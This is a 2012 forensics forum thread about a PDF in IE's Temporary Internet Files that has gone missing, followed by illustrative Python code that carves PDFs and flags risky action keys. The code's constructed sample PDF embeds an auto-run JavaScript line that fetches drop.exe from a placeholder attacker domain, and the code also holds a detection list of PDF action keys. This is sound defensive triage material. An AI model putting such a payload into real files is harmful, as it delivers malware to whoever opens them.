where is the downloaded pdf file?

(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

I am trying to determine where the pdf file is that I see downloaded by a user by viewing their IE history. Log shows c\users\<userprofile>\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Low\Content.IE5\<IECreatedTempFolder>\<nameoffile>.pdf

I used a forensic tool to search for this specific file and ntuser.dat shows the above, however I cannot find the actual file. I searched registry keys for MRU, UserAssist, etc. entries but nothing found. So what happened? Was the user able to open the file and was malware executed?

 
Posted : 05/12/2012 7:17 pm
jaclaz
(@jaclaz)
Posts: 5133
Illustrious Member
 

So what happened? Was the user able to open the file and was malware executed?

It is possible that it was a self-deleting (malware) file.

What do you mean with

however I cannot find the actual file.

How exactly were you looking for it?
(with which tools, exactly how)

It seems like you were looking for traces of it in logs and Registry, but what about the actual filesystem?

jaclaz

 
Posted : 05/12/2012 7:33 pm
(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

Search was performed using xways (keywords were the malicious domain and pdf file). Xways searches everything (filesystem, etc.).

 
Posted : 05/12/2012 7:55 pm
jaclaz
(@jaclaz)
Posts: 5133
Illustrious Member
 

Search was performed using xways (keywords were the malicious domain and pdf file). Xways searches everything (filesystem, etc.).

Then, try recovering each and every .pdf file in the filesystem; the particular file could have been renamed, moved and whatnot.

If the file was downloaded and the internet source address is still available, download a copy of it and use its contents to get new "keywords" for a new search on the filesystem.

jaclaz

 
Posted : 05/12/2012 8:05 pm
(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

I did try to go to the site but it's no longer available.

Thanks.

 
Posted : 05/12/2012 8:20 pm
(@timbo4664)
Posts: 12
Active Member
 

Have you searched for active and deleted link files, evidence of local file accesses in Internet History (file///) entries, as well as Registry MRUs to see if there are any other traces of the file?

I see that you have posted that the file is listed as being located in Temporary Internet Files, but could it be possible that the file was never cached to TIF, and maybe only viewed? It would seem that if the file is actually listed as a file in TIF that it would be cached to disk, but maybe that isn't an absolute rule and some testing may be in order to determine this.

It could also have been downloaded, later deleted, and then overwritten (either by pure happenstance or purposefully with a file wiping tool that also cleans up MFT entries).

Just a couple of thoughts to help.

Tim Moniot

 
Posted : 06/12/2012 12:09 am
(@digitalcoroner)
Posts: 46
Eminent Member
Topic starter
 

Yes, I believe it may have only been viewed. If it were cached would it still be located in TIF? What setting determines if a file is cached (kept) or not? The folder the pdf file was downloaded to in TIF is still there and contains other files, but this specific pdf file is not there.

I did look for link files, UserAssist, MRU, etc. and found no indication of the file being opened. I know that some malware methodologies involve deleting downloaded files after the malware was dropped. Perhaps this pdf contained script to download malware, but I don't see any indicators that malware was dropped.

Thank you.

 
Posted : 06/12/2012 3:03 pm
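As an added illustration of jaclaz's suggestion (recover every PDF on the filesystem and use its contents as new keywords) and of the question raised in the last post (did the PDF carry a script?): the Python below is example code written for this page, not code from the thread or from any tool mentioned in it. It carves PDF bodies out of a byte blob (e.g. an unallocated-space export) by their %PDF- / %%EOF markers, then ranks each carved file by keyword hits and by the presence of action keys worth a closer look. The blob, the two embedded PDFs and the domain evil-example.invalid are constructed samples.

```python
import re

# Constructed sample: an unallocated-space style blob with two embedded PDFs.
# Nothing here comes from the thread; "evil-example.invalid" is a placeholder domain.
SUSPECT_DOMAIN = b"evil-example.invalid"

BENIGN_PDF = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SUSPECT_PDF = (
    b"%PDF-1.6\n1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS (app.launchURL('http://" + SUSPECT_DOMAIN
    + b"/drop.exe')) >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE_BLOB = b"\x00" * 64 + BENIGN_PDF + b"\xff" * 32 + SUSPECT_PDF + b"\x00" * 16

# PDF name objects that trigger actions or hide payloads; presence alone is not proof of malice.
RISKY_KEYS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/URI", b"/EmbeddedFile"]

def carve_pdfs(data):
    """Return (offset, bytes) for each %PDF- header up to the next %%EOF marker."""
    out, pos = [], 0
    while True:
        start = data.find(b"%PDF-", pos)
        if start < 0:
            break
        end = data.find(b"%%EOF", start)
        if end < 0:  # truncated or overwritten tail: keep what is recoverable
            out.append((start, data[start:]))
            break
        end += len(b"%%EOF")
        out.append((start, data[start:end]))
        pos = end
    return out

def pdf_indicators(pdf, keywords):
    """List risky name objects (whole-name match) and case-insensitive keyword hits."""
    return {
        "risky_keys": [k.decode() for k in RISKY_KEYS
                       if re.search(re.escape(k) + rb"(?![A-Za-z])", pdf)],
        "keyword_hits": [k.decode() for k in keywords if k.lower() in pdf.lower()],
    }

def triage(data, keywords):
    """Carve every PDF in `data` and flag those with keyword hits or risky keys."""
    rows = []
    for off, pdf in carve_pdfs(data):
        ind = pdf_indicators(pdf, keywords)
        rows.append({"offset": off, "size": len(pdf), **ind,
                     "suspicious": bool(ind["keyword_hits"] or ind["risky_keys"])})
    return rows
```

Run `triage(SAMPLE_BLOB, [SUSPECT_DOMAIN])` to see the benign PDF pass and the second one flagged on both the domain keyword and its /OpenAction + /JavaScript chain; on a real case, feed the carved bodies' strings back in as the next round of keywords, as jaclaz suggests.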